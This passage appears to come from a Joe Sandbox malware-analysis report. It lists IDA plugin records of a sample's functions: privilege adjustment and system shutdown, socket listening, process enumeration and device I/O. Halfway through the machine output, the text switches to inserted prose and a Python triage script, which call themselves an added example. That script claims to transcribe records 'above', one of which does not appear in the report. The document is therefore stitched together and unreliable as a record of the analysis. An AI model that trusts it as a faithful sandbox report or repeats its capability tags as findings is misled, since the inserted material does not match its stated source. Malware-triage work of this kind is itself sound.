                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: lstrlen
                                          • String ID: ($AddRef$InterfaceDispatch$QueryInterface$Release$|
                                          • API String ID: 1659193697-2318614619
                                          • Opcode ID: 07885ee78107f9333a1930670d9a4f38a13e772dfd8660925b7d865db7f8e1ee
                                          • Instruction ID: eaf6b1876ebffdd547ee462ad71ddde97574cc299014fab7c2a56e4220afb1cb
                                          • Opcode Fuzzy Hash: 07885ee78107f9333a1930670d9a4f38a13e772dfd8660925b7d865db7f8e1ee
                                          • Instruction Fuzzy Hash: 6C323675A007159FDB28CF19D481A6AB7F0FF48310B15D56EE89AEB3A2DB70E941CB40
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memmove
                                          • String ID:
                                          • API String ID: 4104443479-0
                                          • Opcode ID: b5d69f96596611db9969a60910e810312ec6522dc989bd5623743b7c526976d2
                                          • Instruction ID: cb463605acb376408511de116570a5783316c35a927e0bea807d8b962dac98a3
                                          • Opcode Fuzzy Hash: b5d69f96596611db9969a60910e810312ec6522dc989bd5623743b7c526976d2
                                          • Instruction Fuzzy Hash: 6512CB70A00619DFCF14DFA5E981AEEB7F5FF48304F108269E406A7296EB35AD15CB60
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                            • Part of subcall function 00DD2344: GetCursorPos.USER32(?), ref: 00DD2357
                                            • Part of subcall function 00DD2344: ScreenToClient.USER32(00E967B0,?), ref: 00DD2374
                                            • Part of subcall function 00DD2344: GetAsyncKeyState.USER32(00000001), ref: 00DD2399
                                            • Part of subcall function 00DD2344: GetAsyncKeyState.USER32(00000002), ref: 00DD23A7
                                          • ReleaseCapture.USER32 ref: 00E5C2F0
                                          • SetWindowTextW.USER32(?,00000000), ref: 00E5C39A
                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00E5C3AD
                                          • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?), ref: 00E5C48F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                          • API String ID: 973565025-2107944366
                                          • Opcode ID: 23a91737efbbef1f7b379c697c0cc6ddbb798cd38e8215a6443fa9cb6765e29d
                                          • Instruction ID: 9f54c69de70435e2870f4231cdb3e3608252eaaf089d52eed6147befdb201dc5
                                          • Opcode Fuzzy Hash: 23a91737efbbef1f7b379c697c0cc6ddbb798cd38e8215a6443fa9cb6765e29d
                                          • Instruction Fuzzy Hash: BA51B170204304AFDB14EF20CC56F6A7BE5EF88315F10492EF995A72E1DB71A948CB62
                                          APIs
                                            • Part of subcall function 00E28CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E28D0D
                                            • Part of subcall function 00E28CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E28D3A
                                            • Part of subcall function 00E28CC3: GetLastError.KERNEL32 ref: 00E28D47
                                          • ExitWindowsEx.USER32(?,00000000), ref: 00E3549B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                          • String ID: $@$SeShutdownPrivilege
                                          • API String ID: 2234035333-194228
                                          • Opcode ID: 9b47ea9b487251a10eb097e2c11314ff582c665093ae64b13c155180d610cfcd
                                          • Instruction ID: 3f15324224c875855f0db419e0d55e3be4cc3df193fad51cd81db4c8fdbac69b
                                          • Opcode Fuzzy Hash: 9b47ea9b487251a10eb097e2c11314ff582c665093ae64b13c155180d610cfcd
                                          • Instruction Fuzzy Hash: 7001D832655B116EE72C6674AC4EBBA7A98AB05353F282521FD27F22D3D6905C80C590
                                          APIs
                                          • socket.WS2_32(00000002,00000001,00000006), ref: 00E465EF
                                          • WSAGetLastError.WS2_32(00000000), ref: 00E465FE
                                          • bind.WS2_32(00000000,?,00000010), ref: 00E4661A
                                          • listen.WS2_32(00000000,00000005), ref: 00E46629
                                          • WSAGetLastError.WS2_32(00000000), ref: 00E46643
                                          • closesocket.WS2_32(00000000), ref: 00E46657
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                          • String ID:
                                          • API String ID: 1279440585-0
                                          • Opcode ID: ecba1863662a6fc26a1c15c0bcad860e825fa3eed6ba009b5e7ffaa2a5a1a631
                                          • Instruction ID: e10a8fac6125a7489b17ddd361f5ee4f9e1f9d48528e1d449608d890cdc04f94
                                          • Opcode Fuzzy Hash: ecba1863662a6fc26a1c15c0bcad860e825fa3eed6ba009b5e7ffaa2a5a1a631
                                          • Instruction Fuzzy Hash: 9A21CE31200210AFCB04AF24E845B6EB7F9EF49325F11959AE956B73D1CB30AD048B61
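The records above are per-function output of the Joe Sandbox IDA plugin: a list of imported APIs with the argument values observed (hex, `?` where unknown), the `$`-joined string references, and the opcode and instruction hashes used for similarity matching. When triaging such a listing, what a practitioner usually wants is the API set of each record reduced to a capability tag and the raw socket() constants decoded (`00000002,00000001,00000006` is AF_INET/SOCK_STREAM/IPPROTO_TCP; `00000002,00000002,00000011` in the next record is AF_INET/SOCK_DGRAM/IPPROTO_UDP). The script below is an added example, not part of the Joe Sandbox report or of the analysed sample. It parses a transcription of three of the records above (the FindFirstFileW/DeleteFileW loop, the SeShutdownPrivilege/ExitWindowsEx function and the socket/bind/listen function), constructed here as `SAMPLE` and trimmed to the fields the parser reads; the API-to-capability mapping is this example's own choice, not a Joe Sandbox feature.

```python
"""Parse Joe Sandbox IDA-plugin function records and tag each with capabilities."""
import re
from dataclasses import dataclass, field

# Constructed sample: three records transcribed from the report section above,
# reduced to the lines this parser uses. Not machine output.
SAMPLE = r"""
APIs
  • Part of subcall function 00DD48AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00DD48A1,?,?,00DD37C0,?), ref: 00DD48CE
• FindFirstFileW.KERNEL32(?,?), ref: 00E33ADF
• DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 00E33B87
• MoveFileW.KERNEL32(?,?), ref: 00E33B9A
• FindNextFileW.KERNEL32(00000000,00000010), ref: 00E33BD9
• FindClose.KERNEL32(00000000,?,?,?,?), ref: 00E33BF5
Similarity
• API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
• String ID: \*.*
• Opcode ID: f80052073e51c053f75b222d1f365945691145110bacee5e8b3981a9722e629c
• Instruction Fuzzy Hash: 65518F31805249AACF15EBA0DD96DEDBBB8AF14304F2451AAE44277191EF306F0DCBB0
APIs
  • Part of subcall function 00E28CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00E28D0D
  • Part of subcall function 00E28CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00E28D3A
• ExitWindowsEx.USER32(?,00000000), ref: 00E3549B
Similarity
• String ID: $@$SeShutdownPrivilege
• Opcode ID: 9b47ea9b487251a10eb097e2c11314ff582c665093ae64b13c155180d610cfcd
• Instruction Fuzzy Hash: 7001D832655B116EE72C6674AC4EBBA7A98AB05353F282521FD27F22D3D6905C80C590
APIs
• socket.WS2_32(00000002,00000001,00000006), ref: 00E465EF
• bind.WS2_32(00000000,?,00000010), ref: 00E4661A
• listen.WS2_32(00000000,00000005), ref: 00E46629
• closesocket.WS2_32(00000000), ref: 00E46657
Similarity
• String ID:
• Opcode ID: ecba1863662a6fc26a1c15c0bcad860e825fa3eed6ba009b5e7ffaa2a5a1a631
• Instruction Fuzzy Hash: 9A21CE31200210AFCB04AF24E845B6EB7F9EF49325F11959AE956B73D1CB30AD048B61
"""

# One API line: optional "Part of subcall function XXXX:" prefix, then Name.MODULE(args)
API_RE = re.compile(
    r"•\s+(?P<sub>Part of subcall function [0-9A-F]+:\s+)?"
    r"(?P<api>[\w:@]+)\.(?P<mod>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
)

# Winsock constants as Joe Sandbox prints them (hex); the mapping is standard Winsock.
AF = {2: "AF_INET", 23: "AF_INET6"}
SOCK = {1: "SOCK_STREAM", 2: "SOCK_DGRAM", 3: "SOCK_RAW"}
PROTO = {0: "IPPROTO_IP", 6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)     # (api, module, [args], is_subcall)
    strings: list = field(default_factory=list)  # entries of the "$"-joined String ID
    opcode_id: str = ""
    instruction_fuzzy_hash: str = ""

    def all_apis(self):
        return {api for api, _, _, _ in self.apis}


def parse_records(text):
    """Split the plugin text into records; each ends at its Instruction Fuzzy Hash line."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("• String ID:"):
            cur.strings = [s for s in line.split(":", 1)[1].strip().split("$") if s]
        elif line.startswith("• Opcode ID:"):
            cur.opcode_id = line.split(":", 1)[1].strip()
        elif line.startswith("• Instruction Fuzzy Hash:"):
            cur.instruction_fuzzy_hash = line.split(":", 1)[1].strip()
            records.append(cur)
            cur = FunctionRecord()
        else:
            m = API_RE.match(line)
            if m:
                args = [a for a in (m.group("args") or "").split(",") if a]
                cur.apis.append((m.group("api"), m.group("mod"), args, bool(m.group("sub"))))
    return records


def decode_socket(args):
    """Decode socket(af, type, protocol) from the recorded hex values; None if unknown (?)."""
    try:
        af, typ, proto = (int(a, 16) for a in args[:3])
    except ValueError:
        return None
    return (AF.get(af, f"af={af}"), SOCK.get(typ, f"type={typ}"), PROTO.get(proto, f"proto={proto}"))


def tag_capabilities(rec):
    """Map the API set of one record to capability tags (this example's own mapping)."""
    apis, tags = rec.all_apis(), []
    if {"LookupPrivilegeValueW", "AdjustTokenPrivileges"} <= apis and "SeShutdownPrivilege" in rec.strings:
        tags.append("enables SeShutdownPrivilege")
    if "ExitWindowsEx" in apis:
        tags.append("shutdown/reboot/logoff (ExitWindowsEx)")
    if {"FindFirstFileW", "FindNextFileW", "DeleteFileW"} <= apis:
        tags.append("enumerates and deletes files")
    for api, mod, args, _ in rec.apis:
        if api == "socket" and mod == "WS2_32" and decode_socket(args):
            tags.append("socket(%s, %s, %s)" % decode_socket(args))
    if {"socket", "bind", "listen"} <= apis:
        tags.append("TCP listener (bind+listen)")
    elif {"socket", "bind"} <= apis:
        tags.append("bound socket without listen (UDP-style)")
    return tags


def analyze(text):
    """Return {opcode_id: [tags]} for every record in the text."""
    return {rec.opcode_id: tag_capabilities(rec) for rec in parse_records(text)}


if __name__ == "__main__":
    for opcode_id, tags in analyze(SAMPLE).items():
        print(opcode_id[:16], ", ".join(tags) or "(no tag)")
```

The `@GUI_DRAGFILE` and `@GUI_DROPID` strings in an earlier record are AutoIt GUI macros, so these functions are the AutoIt runtime's own library (TCPListen, UDPBind, Shutdown and file functions are all part of it). A tag therefore means the interpreter carries that capability, not that the compiled script exercises it; treat the tags as a capability surface to check against the behaviour and network sections of the report rather than as evidence on their own.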
                                          APIs
                                            • Part of subcall function 00DF0FF6: std::exception::exception.LIBCMT ref: 00DF102C
                                            • Part of subcall function 00DF0FF6: __CxxThrowException@8.LIBCMT ref: 00DF1041
                                          • _memmove.LIBCMT ref: 00E2062F
                                          • _memmove.LIBCMT ref: 00E20744
                                          • _memmove.LIBCMT ref: 00E207EB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                          • String ID:
                                          • API String ID: 1300846289-0
                                          • Opcode ID: 1d0f45693cdc10c0e175141240aeaf90635ec43f459a9b7e310e4770dcfb5f32
                                          • Instruction ID: 27369e3d573438aa97ebcaae6dd42a20f075fe81c56c5c792b7bfc41146cd5cf
                                          • Opcode Fuzzy Hash: 1d0f45693cdc10c0e175141240aeaf90635ec43f459a9b7e310e4770dcfb5f32
                                          • Instruction Fuzzy Hash: E302A170A00219DFCF04DF65E981ABE7BB5FF44344F158069E80AEB296EB31D954CBA1
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00DD19FA
                                          • GetSysColor.USER32(0000000F), ref: 00DD1A4E
                                          • SetBkColor.GDI32(?,00000000), ref: 00DD1A61
                                            • Part of subcall function 00DD1290: NtdllDialogWndProc_W.NTDLL(?,00000020,?), ref: 00DD12D8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ColorDialogNtdllProc_$LongWindow
                                          • String ID:
                                          • API String ID: 591255283-0
                                          • Opcode ID: ab4ce32cb18e3aad4f146bcaf2289f49c5fc2164c9d59062fddb0c8b17cf4313
                                          • Instruction ID: 8541766bc78a7e1f1931eab4919d4d044e61637fda23751d6a91089265e906fc
                                          • Opcode Fuzzy Hash: ab4ce32cb18e3aad4f146bcaf2289f49c5fc2164c9d59062fddb0c8b17cf4313
                                          • Instruction Fuzzy Hash: 29A18B78105545BFE638AB298C99DBF359CEB42346F28251BF442F63D6CE20CC46D6B1
                                          APIs
                                            • Part of subcall function 00E480A0: inet_addr.WS2_32(00000000), ref: 00E480CB
                                          • socket.WS2_32(00000002,00000002,00000011), ref: 00E46AB1
                                          • WSAGetLastError.WS2_32(00000000), ref: 00E46ADA
                                          • bind.WS2_32(00000000,?,00000010), ref: 00E46B13
                                          • WSAGetLastError.WS2_32(00000000), ref: 00E46B20
                                          • closesocket.WS2_32(00000000), ref: 00E46B34
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                          • String ID:
                                          • API String ID: 99427753-0
                                          • Opcode ID: 455eab7ee60b1b5119b38d3201ff72aa09d9d57e356de6b858ce947b3e87536b
                                          • Instruction ID: f2786808c275e17c6e5fec8007d4d785695efdb2b9aec97852a6fd81dec666a2
                                          • Opcode Fuzzy Hash: 455eab7ee60b1b5119b38d3201ff72aa09d9d57e356de6b858ce947b3e87536b
                                          • Instruction Fuzzy Hash: 0F41C275740210AFEB10BF24DC96F6EB7A8DB09710F04945AF91ABB3D2DA719D008BB1
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                          • String ID:
                                          • API String ID: 292994002-0
                                          • Opcode ID: 4b14f2554d5d80235b9e0373e06683637a901f19a02bc11920ce205348179cc3
                                          • Instruction ID: 62d735ddf065994cf34dc080829d359e860e0fa6f40441425401f077a260711f
                                          • Opcode Fuzzy Hash: 4b14f2554d5d80235b9e0373e06683637a901f19a02bc11920ce205348179cc3
                                          • Instruction Fuzzy Hash: 6E11C8333006509FD7211F27DC64B6FB798EF44726B81582AFC06F7241CBB09D058AA5
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __itow__swprintf
                                          • String ID:
                                          • API String ID: 674341424-0
                                          • Opcode ID: 6ce0fc4889699d26c98d778ebfce97aa376dae03d37a6e60766e470cd36fa888
                                          • Instruction ID: 7b9fc9bd8ee8877f75911834bb5041c949c1a0f59818c2ee9ac5c17b4c4ba1e2
                                          • Opcode Fuzzy Hash: 6ce0fc4889699d26c98d778ebfce97aa376dae03d37a6e60766e470cd36fa888
                                          • Instruction Fuzzy Hash: 07229B716083419FC724EF24C895BABB7E4EF84704F14491DF99AA7391DB31EA44CBA2
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 00E4F151
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00E4F15F
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                          • Process32NextW.KERNEL32(00000000,?), ref: 00E4F21F
                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00E4F22E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                          • String ID:
                                          • API String ID: 2576544623-0
                                          • Opcode ID: 1deaae7efb37edc70328a24da4920c2cbacdee284fa5f365ec01cfe4389ab019
                                          • Instruction ID: e0c5c63e6e19d67df91d908320575f0e9d1033cb7d097441317280c050f7f03b
                                          • Opcode Fuzzy Hash: 1deaae7efb37edc70328a24da4920c2cbacdee284fa5f365ec01cfe4389ab019
                                          • Instruction Fuzzy Hash: 8D517D71504711AFD310EF24DC95E6BB7E8FF94710F10582EF495972A2EB70A908CBA2
                                          APIs
                                            • Part of subcall function 00DD2612: GetWindowLongW.USER32(?,000000EB), ref: 00DD2623
                                          • GetCursorPos.USER32(?), ref: 00E5C7C2
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E0BBFB,?,?,?,?,?), ref: 00E5C7D7
                                          • GetCursorPos.USER32(?), ref: 00E5C824
                                          • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E0BBFB,?,?,?), ref: 00E5C85E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                          • String ID:
                                          • API String ID: 1423138444-0
                                          • Opcode ID: ff9deda90ba9b78a8c847c4731f078bb922f507f0182cdb578a93192a0f63b4a
                                          • Instruction ID: f647526dd80feb79eae610cd8ca1d15d95809f747524e4e67c77aebf94fb3304
                                          • Opcode Fuzzy Hash: ff9deda90ba9b78a8c847c4731f078bb922f507f0182cdb578a93192a0f63b4a
                                          • Instruction Fuzzy Hash: A831E635500218AFCB19CF59C8A8EEA7BB5EB09315F144466FD05A7261C731AD54DF60
                                          APIs
                                          • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00E340D1
                                          • _memset.LIBCMT ref: 00E340F2
                                          • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 00E34144
                                          • CloseHandle.KERNEL32(00000000), ref: 00E3414D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                           • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmp
